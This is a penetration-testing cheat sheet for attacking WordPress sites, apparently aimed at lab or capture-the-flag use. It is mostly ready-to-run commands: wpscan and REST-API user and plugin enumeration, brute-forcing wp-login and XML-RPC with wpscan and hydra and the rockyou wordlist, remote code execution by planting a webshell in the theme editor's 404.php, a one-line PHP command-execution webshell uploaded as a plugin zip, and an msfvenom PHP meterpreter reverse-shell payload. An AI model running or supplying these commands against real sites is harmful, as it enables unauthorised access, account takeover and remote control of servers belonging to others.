WordPress Attacks

Enumeration

Command	Description
`wpscan --url http://<IP>/wordpress/ -e u,vp,ap,tt,t,cb,dbe`	Full enumeration - users, plugins, themes, config backups, DB exports.
`wpscan --url http://<IP>/wordpress/ -e u`	Enumerate users only.
`wpscan --url http://<IP>/wordpress/ --api-token <token> -e vp`	Enumerate vulnerable plugins (requires API token).
`curl http://<IP>/wordpress/wp-login.php`	Confirm WordPress login page exists.
`curl http://<IP>/wordpress/xmlrpc.php`	Check if XML-RPC is enabled (200 = enabled).
`curl http://<IP>/wordpress/CHANGELOG.txt`	Check WordPress version from changelog.
`curl http://<IP>/wordpress/wp-json/wp/v2/users`	Enumerate users via REST API if enabled.

Credential Brute Force

Command	Description
`wpscan --url http://<IP>/wordpress/ --usernames admin --passwords /usr/share/wordlists/rockyou.txt --password-attack xmlrpc`	Brute force via XML-RPC (avoids wp-login lockouts).
`wpscan --url http://<IP>/wordpress/ --usernames admin --passwords /usr/share/wordlists/rockyou.txt --password-attack wp-login`	Brute force directly against wp-login.php.
`hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:ERROR"`	Hydra brute force against wp-login form.

Common Issues

Problem	Fix
`siteurl` points to a hostname (e.g., `wordpress.local`)	Add `<IP> wordpress.local` to `/etc/hosts`
Login redirects to a different domain	Update `siteurl` in the database via `wp-config.php` credentials
XML-RPC not enabled	Fall back to wp-login brute force

Theme Editor RCE

wp-admin -> Appearance -> Theme Editor -> 404.php

Insert a PHP webshell or reverse shell into the template, save, then browse to: http://<IP>/wordpress/wp-content/themes/<theme>/404.php

Plugin Upload RCE

# Package a PHP reverse shell as a plugin zip
echo '<?php system($_GET["cmd"]); ?>' > shell.php
zip shell.zip shell.php
# wp-admin -> Plugins -> Add New -> Upload Plugin -> shell.zip

WP File Manager (v6.x / 7.x)

With admin credentials, the WP File Manager plugin allows direct filesystem access:

wp-admin -> WP File Manager -> navigate to webroot -> upload shell.php

# Generate PHP meterpreter payload
msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP> LPORT=4444 -f raw > shell.php

Useful Paths

Path	Description
`/wordpress/wp-login.php`	Login page
`/wordpress/xmlrpc.php`	XML-RPC endpoint
`/wordpress/wp-admin/`	Admin dashboard
`/wordpress/wp-content/uploads/`	Upload directory (often listing enabled)
`/wordpress/wp-config.php`	Database credentials (not directly accessible via HTTP)
`/wordpress/wp-includes/version.php`	WordPress version